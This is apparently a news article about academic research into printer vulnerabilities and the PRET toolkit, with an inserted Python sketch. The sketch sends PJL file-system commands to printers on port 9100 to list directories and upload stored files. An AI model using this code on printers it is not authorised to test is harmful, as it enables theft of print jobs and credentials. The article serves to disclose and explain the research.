New research published by academics has resurfaced several serious vulnerabilities in popular internet-connected printers, which if exploited could allow an attacker to remotely steal sensitive documents from print jobs.
The researchers published six security advisories, along with a blog post, a wiki, and an open-source toolkit that can be used to steal passwords, shut down or hijack networked printers, and remotely retrieve stored copies of printed documents.
The researchers said at least 20 network printer models built by Dell, HP, Lexmark, Brother, Samsung, and others were confirmed to be affected by previously disclosed security vulnerabilities that have remained unpatched for several years.
One of the researchers, speaking to me on Monday, said many more devices could be affected.
"I was searching for a topic for a master's thesis, and printers seemed a good catch -- [there were] not many scientific publications yet, while the generic danger of printing languages like PostScript was already somehow known for decades," said Jens Müller in an email.
Müller, who worked with his colleagues Vladislav Mladenov and Juraj Somorovsky, spent a year building the toolkit, dubbed the Printer Exploitation Toolkit (or "PRET"). At its heart, PRET connects to an affected printer over the network or by USB and abuses features of one of three common printer languages: PostScript, PJL, and PCL.
The toolkit translates simple, shell-like commands into the printer language the device speaks and presents the printer's replies in a readable form.
All the toolkit needs is a valid target, such as the IP address of a vulnerable printer.
A cursory search on Shodan, a search engine that indexes internet-exposed devices and services, lists tens of thousands of printers in the US alone.
A successful attack could allow an attacker to siphon off the printer's memory to access print jobs of potentially sensitive files, like contracts, corporate information, or patient information.
Worse, the researchers say, an attacker could use one of the long-known bugs to read credentials stored on the printer, such as those used to send scans by email, or other corporate accounts if the printer is used for functions like scanning and faxing.
"This way an attacker can escalate her way into a network, using the printer device as a starting point," said the researchers in the blog post. Some printers "have not limited this feature to a certain directory, which leads to the disclosure of sensitive information like passwords," they said.
The researchers' advisory for that bug says a number of Brother and Konica Minolta printers are affected.
Müller said the bug is "pretty easy to reproduce," but it still hasn't been fixed, years after it was first discovered. He added that the bug "seems to be present in all Brother-based laser printers we could test so far".
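To make concrete what the toolkit's "translation" layer described above does, and which printer-language feature the file-system bug lives in, here is an added Python sketch. It is not PRET's code and not from the researchers: it wraps shell-like commands (the names `id`, `ls` and `cat` are chosen here for illustration) in standard PJL commands taken from HP's PJL Technical Reference (INFO ID, FSDIRLIST, FSUPLOAD), sends them to the raw printing port 9100, and parses the replies. The sample responses are constructed so the parsing runs offline; `send_pjl` needs a real printer and a host you are authorised to test. It deliberately implements no vendor-specific traversal: FSDIRLIST and FSUPLOAD are simply the PJL file-system commands that a printer which "has not limited this feature to a certain directory" would answer too freely.

```python
"""Minimal PJL client in the spirit of PRET (added example, not PRET itself).

Translates a tiny hypothetical command set into PJL and parses the replies.
The SAMPLE_* responses below are constructed for offline testing.
"""
import re
import socket

UEL = b"\x1b%-12345X"   # Universal Exit Language: puts the printer into PJL mode
PJL_PORT = 9100         # raw ("JetDirect") printing port used by most network printers
FF = b"\x0c"            # form feed terminates INFO and FSDIRLIST replies


def translate(command: str) -> bytes:
    """Map a shell-like command (hypothetical mini-shell) to the PJL it stands for."""
    parts = command.split(maxsplit=1)
    name, arg = parts[0], (parts[1] if len(parts) > 1 else "")
    if name == "id":
        pjl = "@PJL INFO ID"
    elif name == "ls":
        # ENTRY/COUNT select which directory entries to return
        pjl = f'@PJL FSDIRLIST NAME="{arg or "0:/"}" ENTRY=1 COUNT=65535'
    elif name == "cat":
        # OFFSET/SIZE select the byte range; a huge SIZE asks for the whole file
        pjl = f'@PJL FSUPLOAD NAME="{arg}" OFFSET=0 SIZE=2147483647'
    else:
        raise ValueError(f"unsupported command: {name}")
    return UEL + b"@PJL\r\n" + pjl.encode("ascii") + b"\r\n"


def parse_info_id(resp: bytes) -> str:
    """'@PJL INFO ID\\r\\n"Model"\\r\\n\\x0c' -> 'Model'."""
    text = resp.decode("latin-1")
    m = re.search(r'@PJL INFO ID\r?\n"?([^"\r\n\x0c]*)"?', text)
    if not m:
        raise ValueError("no INFO ID response")
    return m.group(1).strip()


def parse_dirlist(resp: bytes) -> list:
    """Parse an FSDIRLIST reply into (name, type, size) tuples."""
    text = resp.decode("latin-1")
    entries = []
    for line in text.split("\n")[1:]:          # first line echoes the command
        line = line.strip("\r\x0c ")
        if not line:
            continue
        if "FILEERROR" in line:                # printer refused or path does not exist
            raise ValueError(line)
        m = re.match(r"(.+?)\s+TYPE=(DIR|FILE)(?:\s+SIZE=(\d+))?", line)
        if m:
            size = int(m.group(3)) if m.group(3) else None
            entries.append((m.group(1), m.group(2), size))
    return entries


def parse_upload(resp: bytes) -> bytes:
    """Extract the file bytes from an FSUPLOAD reply.

    Reply shape: '@PJL FSUPLOAD FORMAT:BINARY NAME="..." OFFSET=0 SIZE=n\\r\\n' + n bytes.
    """
    header, sep, body = resp.partition(b"\r\n")
    m = re.search(rb"SIZE=(\d+)", header)
    if not sep or not m or b"FILEERROR" in header:
        raise ValueError("no usable FSUPLOAD response")
    return body[: int(m.group(1))]


def send_pjl(host: str, data: bytes, port: int = PJL_PORT,
             timeout: float = 5.0, stop_on_ff: bool = True) -> bytes:
    """Send raw PJL to a printer and read the reply (needs a real printer)."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(data)
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
            if stop_on_ff and FF in chunk:     # binary uploads may contain 0x0c
                break
    return b"".join(chunks)


# Constructed sample replies, shaped like the PJL reference describes them.
SAMPLE_ID = b'@PJL INFO ID\r\n"Example LaserJet 4250"\r\n\x0c'
SAMPLE_DIRLIST = (b'@PJL FSDIRLIST NAME="0:/" ENTRY=1\r\n'
                  b". TYPE=DIR\r\n.. TYPE=DIR\r\nPJL TYPE=DIR\r\n"
                  b"webServer TYPE=DIR\r\nsavedjob.pdf TYPE=FILE SIZE=10240\r\n\x0c")
SAMPLE_UPLOAD = (b'@PJL FSUPLOAD FORMAT:BINARY NAME="0:/savedjob.pdf" OFFSET=0 SIZE=8\r\n'
                 b"%PDF-1.4\x0c")


if __name__ == "__main__":
    import sys
    host = sys.argv[1]   # a printer you are authorised to test
    print(parse_info_id(send_pjl(host, translate("id"))))
    for name, kind, size in parse_dirlist(send_pjl(host, translate("ls 0:/"))):
        print(name, kind, size)
```

Whether a listing request for a path outside the printer's intended volume root comes back as entries or as a FILEERROR is exactly the distinction the researchers' "not limited to a certain directory" finding turns on; this sketch only gives you the plumbing to ask.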
The researchers also found what Müller called a "novel approach" to leaking captured print jobs from a printer, using a victim's web browser as the carrier for the data. This, the researcher says, allows attacks to "go beyond typical printers" to services like Google Cloud Print or document-processing websites.
All of the vendors of affected devices were informed in October, but only Dell responded -- though the researchers say the company did not follow up.
But Müller said it was not clear exactly who was to blame.
"For attacks against standard PostScript and PJL features, the printer manufacturer is not really responsible," he said, because the "standard is flawed". In the case of cross-site printing attacks, the browser vendors are not to blame either.
Google rewarded the group's findings with $3133.70.
The research will be formally presented at Ruhr University Bochum's RuhrSec security conference in May.